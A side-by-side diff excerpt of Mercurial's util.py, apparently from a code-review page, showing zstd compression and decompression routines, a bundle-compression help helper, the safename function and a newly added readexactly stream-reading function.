3752 insize = len(data)
3753 # Caller handles empty input case.
3753 # Caller handles empty input case.
3754 assert insize > 0
3754 assert insize > 0
3755
3755
3756 if insize < 50:
3756 if insize < 50:
3757 return None
3757 return None
3758
3758
3759 elif insize <= 1000000:
3759 elif insize <= 1000000:
3760 compressed = self._cctx.compress(data)
3760 compressed = self._cctx.compress(data)
3761 if len(compressed) < insize:
3761 if len(compressed) < insize:
3762 return compressed
3762 return compressed
3763 return None
3763 return None
3764 else:
3764 else:
3765 z = self._cctx.compressobj()
3765 z = self._cctx.compressobj()
3766 chunks = []
3766 chunks = []
3767 pos = 0
3767 pos = 0
3768 while pos < insize:
3768 while pos < insize:
3769 pos2 = pos + self._compinsize
3769 pos2 = pos + self._compinsize
3770 chunk = z.compress(data[pos:pos2])
3770 chunk = z.compress(data[pos:pos2])
3771 if chunk:
3771 if chunk:
3772 chunks.append(chunk)
3772 chunks.append(chunk)
3773 pos = pos2
3773 pos = pos2
3774 chunks.append(z.flush())
3774 chunks.append(z.flush())
3775
3775
3776 if sum(map(len, chunks)) < insize:
3776 if sum(map(len, chunks)) < insize:
3777 return ''.join(chunks)
3777 return ''.join(chunks)
3778 return None
3778 return None
3779
3779
3780 def decompress(self, data):
3780 def decompress(self, data):
3781 insize = len(data)
3781 insize = len(data)
3782
3782
3783 try:
3783 try:
3784 # This was measured to be faster than other streaming
3784 # This was measured to be faster than other streaming
3785 # decompressors.
3785 # decompressors.
3786 dobj = self._dctx.decompressobj()
3786 dobj = self._dctx.decompressobj()
3787 chunks = []
3787 chunks = []
3788 pos = 0
3788 pos = 0
3789 while pos < insize:
3789 while pos < insize:
3790 pos2 = pos + self._decompinsize
3790 pos2 = pos + self._decompinsize
3791 chunk = dobj.decompress(data[pos:pos2])
3791 chunk = dobj.decompress(data[pos:pos2])
3792 if chunk:
3792 if chunk:
3793 chunks.append(chunk)
3793 chunks.append(chunk)
3794 pos = pos2
3794 pos = pos2
3795 # Frame should be exhausted, so no finish() API.
3795 # Frame should be exhausted, so no finish() API.
3796
3796
3797 return ''.join(chunks)
3797 return ''.join(chunks)
3798 except Exception as e:
3798 except Exception as e:
3799 raise error.RevlogError(_('revlog decompress error: %s') %
3799 raise error.RevlogError(_('revlog decompress error: %s') %
3800 str(e))
3800 str(e))
3801
3801
3802 def revlogcompressor(self, opts=None):
3802 def revlogcompressor(self, opts=None):
3803 opts = opts or {}
3803 opts = opts or {}
3804 return self.zstdrevlogcompressor(self._module,
3804 return self.zstdrevlogcompressor(self._module,
3805 level=opts.get('level', 3))
3805 level=opts.get('level', 3))
3806
3806
3807 compengines.register(_zstdengine())
3807 compengines.register(_zstdengine())
3808
3808
3809 def bundlecompressiontopics():
3809 def bundlecompressiontopics():
3810 """Obtains a list of available bundle compressions for use in help."""
3810 """Obtains a list of available bundle compressions for use in help."""
3811 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3811 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3812 items = {}
3812 items = {}
3813
3813
3814 # We need to format the docstring. So use a dummy object/type to hold it
3814 # We need to format the docstring. So use a dummy object/type to hold it
3815 # rather than mutating the original.
3815 # rather than mutating the original.
3816 class docobject(object):
3816 class docobject(object):
3817 pass
3817 pass
3818
3818
3819 for name in compengines:
3819 for name in compengines:
3820 engine = compengines[name]
3820 engine = compengines[name]
3821
3821
3822 if not engine.available():
3822 if not engine.available():
3823 continue
3823 continue
3824
3824
3825 bt = engine.bundletype()
3825 bt = engine.bundletype()
3826 if not bt or not bt[0]:
3826 if not bt or not bt[0]:
3827 continue
3827 continue
3828
3828
3829 doc = pycompat.sysstr('``%s``\n %s') % (
3829 doc = pycompat.sysstr('``%s``\n %s') % (
3830 bt[0], engine.bundletype.__doc__)
3830 bt[0], engine.bundletype.__doc__)
3831
3831
3832 value = docobject()
3832 value = docobject()
3833 value.__doc__ = doc
3833 value.__doc__ = doc
3834 value._origdoc = engine.bundletype.__doc__
3834 value._origdoc = engine.bundletype.__doc__
3835 value._origfunc = engine.bundletype
3835 value._origfunc = engine.bundletype
3836
3836
3837 items[bt[0]] = value
3837 items[bt[0]] = value
3838
3838
3839 return items
3839 return items
3840
3840
3841 i18nfunctions = bundlecompressiontopics().values()
3841 i18nfunctions = bundlecompressiontopics().values()
3842
3842
3843 # convenient shortcut
3843 # convenient shortcut
3844 dst = debugstacktrace
3844 dst = debugstacktrace
3845
3845
3846 def safename(f, tag, ctx, others=None):
3846 def safename(f, tag, ctx, others=None):
3847 """
3847 """
3848 Generate a name that it is safe to rename f to in the given context.
3848 Generate a name that it is safe to rename f to in the given context.
3849
3849
3850 f: filename to rename
3850 f: filename to rename
3851 tag: a string tag that will be included in the new name
3851 tag: a string tag that will be included in the new name
3852 ctx: a context, in which the new name must not exist
3852 ctx: a context, in which the new name must not exist
3853 others: a set of other filenames that the new name must not be in
3853 others: a set of other filenames that the new name must not be in
3854
3854
3855 Returns a file name of the form oldname~tag[~number] which does not exist
3855 Returns a file name of the form oldname~tag[~number] which does not exist
3856 in the provided context and is not in the set of other names.
3856 in the provided context and is not in the set of other names.
3857 """
3857 """
3858 if others is None:
3858 if others is None:
3859 others = set()
3859 others = set()
3860
3860
3861 fn = '%s~%s' % (f, tag)
3861 fn = '%s~%s' % (f, tag)
3862 if fn not in ctx and fn not in others:
3862 if fn not in ctx and fn not in others:
3863 return fn
3863 return fn
3864 for n in itertools.count(1):
3864 for n in itertools.count(1):
3865 fn = '%s~%s~%s' % (f, tag, n)
3865 fn = '%s~%s~%s' % (f, tag, n)
3866 if fn not in ctx and fn not in others:
3866 if fn not in ctx and fn not in others:
3867 return fn
3867 return fn
3868
3869 def readexactly(stream, n):
3870 '''read n bytes from stream.read and abort if less was available'''
3871 s = stream.read(n)
3872 if len(s) < n:
3873 raise error.Abort(_("stream ended unexpectedly"
3874 " (got %d bytes, expected %d)")
3875 % (len(s), n))
3876 return s
General Comments 0
You need to be logged in to leave comments. Login now